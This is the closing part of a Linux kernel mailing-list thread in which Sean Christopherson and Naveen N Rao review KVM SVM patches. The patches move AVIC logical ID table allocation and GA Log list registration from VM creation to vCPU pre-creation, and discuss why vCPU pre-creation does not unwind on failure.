-	}
-
+	avic_vm_init(kvm);
 	svm_srso_vm_init();
 	return 0;
 }



 - Naveen

^ permalink raw reply related	[flat|nested] 8+ messages in thread

* Re: [PATCH 2/2] KVM: SVM: Drop unnecessary avic_vm_destroy() call on init failure
  2026-06-29 13:27   ` Naveen N Rao
@ 2026-06-30  0:17     ` Sean Christopherson
  0 siblings, 0 replies; 8+ messages in thread
From: Sean Christopherson @ 2026-06-30  0:17 UTC (permalink / raw)
  To: Naveen N Rao; +Cc: Paolo Bonzini, kvm, linux-kernel

On Mon, Jun 29, 2026, Naveen N Rao wrote:
> On Thu, Jun 25, 2026 at 03:09:33PM -0700, Sean Christopherson wrote:
> > Don't bother calling avic_vm_destroy() when allocating the logical ID table
> > fails, as there is nothing to clean up now that the physical ID table is
> > allocated later, on-demand at first vCPU creation.
> > 
> > For all intents and purposes, no functional change intended, as calling
> > avic_vm_destroy() is a big nop in this case.
> > 
> > Fixes: 54ffe74cc4ab ("KVM: SVM: Move AVIC Physical ID table allocation to vcpu_precreate()")
> > Cc: Naveen N Rao (AMD) <naveen@kernel.org>
> > Signed-off-by: Sean Christopherson <seanjc@google.com>
> > ---
> >  arch/x86/kvm/svm/avic.c | 7 +------
> >  1 file changed, 1 insertion(+), 6 deletions(-)
> 
> This LGTM, though I'm not sure this deserves a fixes tag.

Yeah, it's borderline.  Because KVM (x86) doesn't do AUTOSEL, i.e. requires an
explicit "Cc: stable@vger.kernel.org" for the vast majority of cases, we can be
very liberal with Fixes.  And so I like to use Fixes to create a paper trail for
anything where a commit did something that would have necessitate a new version
of the patch, had it been caught in code review.

> FWIW, I have had a patch (part of a larger series I am going to post 
> soon) to move the logical_id_table allocation alongside the physical ID 
> table allocation. I'm fine if you want to queue your patch first, but 
> this is what I have locally:

Ah shoot, I should have read this mail earlier.  While floundering around, trying
to figure out how to deal with kvm_arch_pre_destroy_vm() not being called when
VM creation fails after kvm_arch_init_vm(), I ended up with the same idea, though
I moved *all* of avic_vm_init() to the vCPU-precreate phase.  Because what I
needed was to defer adding the VM to the GA Log list until the VM is fully
created.

> @@ -303,10 +303,16 @@ int avic_alloc_physical_id_table(struct kvm *kvm)
>  	if (kvm_svm->avic_physical_id_table)
>  		return 0;
>  
> +	kvm_svm->avic_logical_id_table = (void *)get_zeroed_page(GFP_KERNEL_ACCOUNT);
> +	if (!kvm_svm->avic_logical_id_table)
> +		return -ENOMEM;
> +
>  	kvm_svm->avic_physical_id_table = (void *)__get_free_pages(GFP_KERNEL_ACCOUNT | __GFP_ZERO,
>  								   avic_get_physical_id_table_order(kvm));
> -	if (!kvm_svm->avic_physical_id_table)
> +	if (!kvm_svm->avic_physical_id_table) {
> +		free_page((unsigned long)kvm_svm->avic_logical_id_table);

Freeing the page on failure is "wrong".  To keep vCPU creation idempotent from
userspace's perspective (well, not truly idempotent, but close-ish), KVM
deliberately doesn't unwind if .vcpu_precreate() fails.  E.g. so that if
allocating the tables succeeds, but a later stage of vCPU creation fails,
subsequent calls to create vCPUs won't fail at the earlier stage.

The nice thing is that since the VM has already been created, there's no need to
every unwind on failure, because it's no different than if KVM had successfully
allocate the assets during VM creation.

This is what I have (I reworked the avic_alloc_logical_id_table() into
avic_vcpu_pre_create() and dropped svm_vcpu_precreate() in a previous commit.
Hrm, maybe that should be avic_vcpu_precreate()...

---
From: Sean Christopherson <seanjc@google.com>
Date: Mon, 29 Jun 2026 12:23:20 -0700
Subject: [PATCH 2/3] KVM: SVM: Do all per-VM AVIC initialization during vCPU
 precreation phase

Move all per-VM AVIC initialization from VM creation to vCPU pre-creation,
i.e. defer allocating the logical ID table and adding the VM to the GA Log
list until vCPUs are created.  This will allow removing the VM from the GA
Log list before vCPUs are destroyed without needing yet another kvm_x86_ops
hook (.vm_pre_destroy() is very intentionally called if and only if VM
creation fully succeeds).

As a bonus, this re-unites physical and logic table allocation, and avoids
allocating a logical table in the unlikely scenario that userspace creates
a VM without an in-kernel local APIC.

Signed-off-by: Sean Christopherson <seanjc@google.com>
---
 arch/x86/kvm/svm/avic.c | 94 +++++++++++++++++++++++++----------------
 arch/x86/kvm/svm/svm.c  |  6 ---
 2 files changed, 57 insertions(+), 43 deletions(-)

diff --git a/arch/x86/kvm/svm/avic.c b/arch/x86/kvm/svm/avic.c
index 5d7adc394e5a..3393e90879e6 100644
--- a/arch/x86/kvm/svm/avic.c
+++ b/arch/x86/kvm/svm/avic.c
@@ -308,47 +308,32 @@ static int avic_alloc_physical_id_table(struct kvm *kvm)
 	return 0;
 }
 
-int avic_vcpu_pre_create(struct kvm *kvm)
+static int avic_alloc_logical_id_table(struct kvm *kvm)
 {
-	if (!irqchip_in_kernel(kvm) || WARN_ON_ONCE(!enable_apicv))
-		return 0;
-
-	return avic_alloc_physical_id_table(kvm);
-}
-
-void avic_vm_destroy(struct kvm *kvm)
-{
-	unsigned long flags;
-	struct kvm_svm *kvm_svm = to_kvm_svm(kvm);
-
-	if (!enable_apicv)
-		return;
-
-	free_page((unsigned long)kvm_svm->avic_logical_id_table);
-	free_pages((unsigned long)kvm_svm->avic_physical_id_table,
-		   avic_get_physical_id_table_order(kvm));
-
-	spin_lock_irqsave(&svm_vm_data_hash_lock, flags);
-	hash_del(&kvm_svm->hnode);
-	spin_unlock_irqrestore(&svm_vm_data_hash_lock, flags);
-}
-
-int avic_vm_init(struct kvm *kvm)
-{
-	unsigned long flags;
-	int err = -ENOMEM;
 	struct kvm_svm *kvm_svm = to_kvm_svm(kvm);
-	struct kvm_svm *k2;
-	u32 vm_id;
 
-	if (!enable_apicv)
+	if (kvm_svm->avic_logical_id_table)
 		return 0;
 
 	kvm_svm->avic_logical_id_table = (void *)get_zeroed_page(GFP_KERNEL_ACCOUNT);
 	if (!kvm_svm->avic_logical_id_table)
-		goto free_avic;
+		return -ENOMEM;
 
-	spin_lock_irqsave(&svm_vm_data_hash_lock, flags);
+	return 0;
+}
+
+static void avic_add_vm_to_ga_log_list(struct kvm *kvm)
+{
+	struct kvm_svm *kvm_svm = to_kvm_svm(kvm);
+	struct kvm_svm *k2;
+	u32 vm_id;
+
+	lockdep_assert_held(&kvm->lock);
+
+	if (kvm_svm->avic_vm_id)
+		return;
+
+	guard(spinlock_irqsave)(&svm_vm_data_hash_lock);
  again:
 	vm_id = next_vm_id = (next_vm_id + 1) & AVIC_VM_ID_MASK;
 	if (vm_id == 0) { /* id is 1-based, zero is not okay */
@@ -364,13 +349,48 @@ int avic_vm_init(struct kvm *kvm)
 	}
 	kvm_svm->avic_vm_id = vm_id;
 	hash_add(svm_vm_data_hash, &kvm_svm->hnode, kvm_svm->avic_vm_id);
-	spin_unlock_irqrestore(&svm_vm_data_hash_lock, flags);
+}
 
+int avic_vcpu_pre_create(struct kvm *kvm)
+{
+	int r;
+
+	if (!irqchip_in_kernel(kvm) || WARN_ON_ONCE(!enable_apicv))
+		return 0;
+
+	/*
+	 * Don't unwind on failure, all actions must be idempotent with respect
+	 * to creating multiple vCPUs, i.e. must persist until the VM is destroyed.
+	 */
+	r = avic_alloc_physical_id_table(kvm);
+	if (r)
+		return r;
+
+	r = avic_alloc_logical_id_table(kvm);
+	if (r)
+		return r;
+
+	avic_add_vm_to_ga_log_list(kvm);
 	return 0;
+}
 
-free_avic:
-	avic_vm_destroy(kvm);
-	return err;
+void avic_vm_destroy(struct kvm *kvm)
+{
+	unsigned long flags;
+	struct kvm_svm *kvm_svm = to_kvm_svm(kvm);
+
+	if (!enable_apicv)
+		return;
+
+	free_page((unsigned long)kvm_svm->avic_logical_id_table);
+	free_pages((unsigned long)kvm_svm->avic_physical_id_table,
+		   avic_get_physical_id_table_order(kvm));
+
+	if (kvm_svm->avic_vm_id) {
+		spin_lock_irqsave(&svm_vm_data_hash_lock, flags);
+		hash_del(&kvm_svm->hnode);
+		spin_unlock_irqrestore(&svm_vm_data_hash_lock, flags);
+	}
 }
 
 static phys_addr_t avic_get_backing_page_address(struct vcpu_svm *svm)
diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
index ab3ffe04bc35..ecd4abd41040 100644
--- a/arch/x86/kvm/svm/svm.c
+++ b/arch/x86/kvm/svm/svm.c
@@ -5297,12 +5297,6 @@ static int svm_vm_init(struct kvm *kvm)
 	if (!pause_filter_count || !pause_filter_thresh)
 		kvm_disable_exits(kvm, KVM_X86_DISABLE_EXITS_PAUSE);
 
-	if (enable_apicv) {
-		int ret = avic_vm_init(kvm);
-		if (ret)
-			return ret;
-	}
-
 	svm_srso_vm_init();
 	return 0;
 }
--

^ permalink raw reply related	[flat|nested] 8+ messages in thread

end of thread, other threads:[~2026-06-30  0:17 UTC | newest]

Thread overview: 8+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-06-25 22:09 [PATCH 0/2] KVM: SVM: Fix a (very) unlikely UAF for GA Log IRQs Sean Christopherson
2026-06-25 22:09 ` [PATCH 1/2] KVM: SVM: Remove VM from the GA Log notifier list before VM destruction Sean Christopherson
2026-06-25 22:26   ` sashiko-bot
2026-06-28 18:30     ` XIAO WU
2026-06-25 22:09 ` [PATCH 2/2] KVM: SVM: Drop unnecessary avic_vm_destroy() call on init failure Sean Christopherson
2026-06-25 22:25   ` sashiko-bot
2026-06-29 13:27   ` Naveen N Rao
2026-06-30  0:17     ` Sean Christopherson

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox